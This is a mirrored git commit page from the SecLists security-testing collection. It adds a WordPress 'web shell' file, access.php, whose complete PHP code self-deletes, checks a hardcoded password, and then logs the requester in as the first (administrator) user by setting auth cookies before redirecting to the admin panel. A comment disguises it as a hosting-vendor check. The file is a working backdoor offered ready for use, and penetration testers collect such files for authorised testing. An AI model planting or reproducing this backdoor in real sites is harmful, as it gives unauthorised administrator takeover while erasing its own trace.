mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-05-01 11:06:42 -04:00
Add Wordpress Web-Shell
Source/Credit: https://gist.github.com/bi0xid/60803a9cca862888b15d94bf46774fb3
This commit is contained in:
g0tmi1k
parent
b794d53a28
commit
cc257c5b5f
1 changed files with 26 additions and 0 deletions
26
Web-Shells/WordPress/access.php
Normal file
26
Web-Shells/WordPress/access.php
Normal file
|
|
@ -0,0 +1,26 @@
|
||||||
|
<?php
|
||||||
|
@unlink(__FILE__);
|
||||||
|
|
||||||
|
// Validate if the request is from Softaculous
|
||||||
|
if($_REQUEST['pass'] != 'mv8gdj4ohqfxpu34yj5ursupfabcmvdm'){ // your password here
|
||||||
|
die("Unauthorized Access");
|
||||||
|
}
|
||||||
|
|
||||||
|
require('wp-blog-header.php');
|
||||||
|
require('wp-includes/pluggable.php');
|
||||||
|
$user_info = get_userdata(1);
|
||||||
|
// Automatic login //
|
||||||
|
$username = $user_info->user_login;
|
||||||
|
$user = get_user_by('login', $username );
|
||||||
|
// Redirect URL //
|
||||||
|
if ( !is_wp_error( $user ) )
|
||||||
|
{
|
||||||
|
wp_clear_auth_cookie();
|
||||||
|
wp_set_current_user ( $user->ID );
|
||||||
|
wp_set_auth_cookie ( $user->ID );
|
||||||
|
|
||||||
|
$redirect_to = user_admin_url();
|
||||||
|
wp_safe_redirect( $redirect_to );
|
||||||
|
|
||||||
|
exit();
|
||||||
|
}
|
||||||
Loading…
Add table
Reference in a new issue